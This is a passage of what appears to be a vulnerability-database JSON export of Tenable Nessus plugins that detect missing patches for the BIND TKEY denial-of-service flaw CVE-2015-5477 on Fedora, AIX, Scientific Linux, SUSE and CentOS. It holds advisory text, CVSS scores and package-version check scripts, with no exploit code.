exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"bind-9.10.2-4.P3.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:05:17", "description": "Include fix for CVE-2015-5477\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-03T00:00:00", "type": "nessus", "title": "Fedora 21 : bind-9.9.6-10.P1.fc21 (2015-12357)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bind", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2015-12357.NASL", "href": "https://www.tenable.com/plugins/nessus/85171", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-12357.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85171);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"FEDORA\", value:\"2015-12357\");\n\n script_name(english:\"Fedora 21 : bind-9.9.6-10.P1.fc21 (2015-12357)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Include fix for CVE-2015-5477\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1247361\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-August/163007.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d30ea575\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"bind-9.9.6-10.P1.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:05:21", "description": "ISC BIND is vulnerable to a denial of service, caused by an error in the handling of TKEY queries. By sending specially-crafted packets, a remote attacker could exploit this vulnerability to cause a REQUIRE assertion failure.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-17T00:00:00", "type": "nessus", "title": "AIX 7.1 TL 2 : bind9 (IV75690)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-04T00:00:00", "cpe": ["cpe:/o:ibm:aix:7.1"], "id": "AIX_IV75690.NASL", "href": "https://www.tenable.com/plugins/nessus/85414", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory bind9_advisory8.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85414);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"AIX 7.1 TL 2 : bind9 (IV75690)\");\n script_summary(english:\"Check for APAR IV75690\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"ISC BIND is vulnerable to a denial of service, caused by an error in\nthe handling of TKEY queries. By sending specially-crafted packets, a\nremote attacker could exploit this vulnerability to cause a REQUIRE\nassertion failure.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:7.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"7.1\", ml:\"02\", sp:\"06\", patch:\"IV75690s6a\", package:\"bos.net.tcp.client\", minfilesetver:\"7.1.0.0\", maxfilesetver:\"7.1.2.19\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:aix_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:05:23", "description": "A flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)\n\nAfter installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-04T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : bind on SL6.x, SL7.x i386/x86_64 (20150729)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:bind", "p-cpe:/a:fermilab:scientific_linux:bind-chroot", "p-cpe:/a:fermilab:scientific_linux:bind-debuginfo", "p-cpe:/a:fermilab:scientific_linux:bind-devel", "p-cpe:/a:fermilab:scientific_linux:bind-libs", "p-cpe:/a:fermilab:scientific_linux:bind-libs-lite", "p-cpe:/a:fermilab:scientific_linux:bind-license", "p-cpe:/a:fermilab:scientific_linux:bind-lite-devel", "p-cpe:/a:fermilab:scientific_linux:bind-sdb", "p-cpe:/a:fermilab:scientific_linux:bind-sdb-chroot", "p-cpe:/a:fermilab:scientific_linux:bind-utils", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20150729_BIND_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/85211", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85211);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"Scientific Linux Security Update : bind on SL6.x, SL7.x i386/x86_64 (20150729)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nAfter installing the update, the BIND daemon (named) will be restarted\nautomatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1508&L=scientific-linux-errata&F=&S=&P=77\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?21635c41\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-libs-lite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-license\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-lite-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-sdb-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"bind-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bind-chroot-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bind-debuginfo-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bind-devel-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bind-libs-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bind-sdb-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bind-utils-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-chroot-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-debuginfo-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-devel-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-libs-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-libs-lite-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"bind-license-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-lite-devel-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-sdb-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-sdb-chroot-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-utils-9.9.4-18.el7_1.3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-debuginfo / bind-devel / bind-libs / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:03:09", "description": "bind was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-5477: Remote DoS via TKEY queries (bsc#939567)\n\nExposure to this issue can not be prevented by either ACLs or configuration options limiting or denying service because the exploitable code occurs early in the packet handling.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-31T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : bind (SUSE-SU-2015:1316-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:bind", "p-cpe:/a:novell:suse_linux:bind-chrootenv", "p-cpe:/a:novell:suse_linux:bind-devel", "p-cpe:/a:novell:suse_linux:bind-doc", "p-cpe:/a:novell:suse_linux:bind-libs", "p-cpe:/a:novell:suse_linux:bind-utils", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2015-1316-1.NASL", "href": "https://www.tenable.com/plugins/nessus/85151", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1316-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85151);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"SUSE SLES11 Security Update : bind (SUSE-SU-2015:1316-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"bind was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-5477: Remote DoS via TKEY queries (bsc#939567)\n\nExposure to this issue can not be prevented by either ACLs or\nconfiguration options limiting or denying service because the\nexploitable code occurs early in the packet handling.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=939567\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5477/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151316-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0f319995\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP1-LTSS :\n\nzypper in -t patch slessp1-bind-12010=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-chrootenv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"1\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.6ESVR11W1-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", cpu:\"s390x\", reference:\"bind-libs-32bit-9.6ESVR11W1-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"bind-9.6ESVR11W1-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"bind-chrootenv-9.6ESVR11W1-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"bind-devel-9.6ESVR11W1-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"bind-doc-9.6ESVR11W1-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"bind-libs-9.6ESVR11W1-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"bind-utils-9.6ESVR11W1-0.6.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:03:12", "description": "Updated bind packages that fix one security issue are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream acknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {}, "published": "2015-07-29T00:00:00", "type": "nessus", "title": "CentOS 6 / 7 : bind (CESA-2015:1513)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:bind", "p-cpe:/a:centos:centos:bind-chroot", "p-cpe:/a:centos:centos:bind-devel", "p-cpe:/a:centos:centos:bind-libs", "p-cpe:/a:centos:centos:bind-libs-lite", "p-cpe:/a:centos:centos:bind-license", "p-cpe:/a:centos:centos:bind-lite-devel", "p-cpe:/a:centos:centos:bind-sdb", "p-cpe:/a:centos:centos:bind-sdb-chroot", "p-cpe:/a:centos:centos:bind-utils", "cpe:/o:centos:centos:6", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2015-1513.NASL", "href": "https://www.tenable.com/plugins/nessus/85047", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory 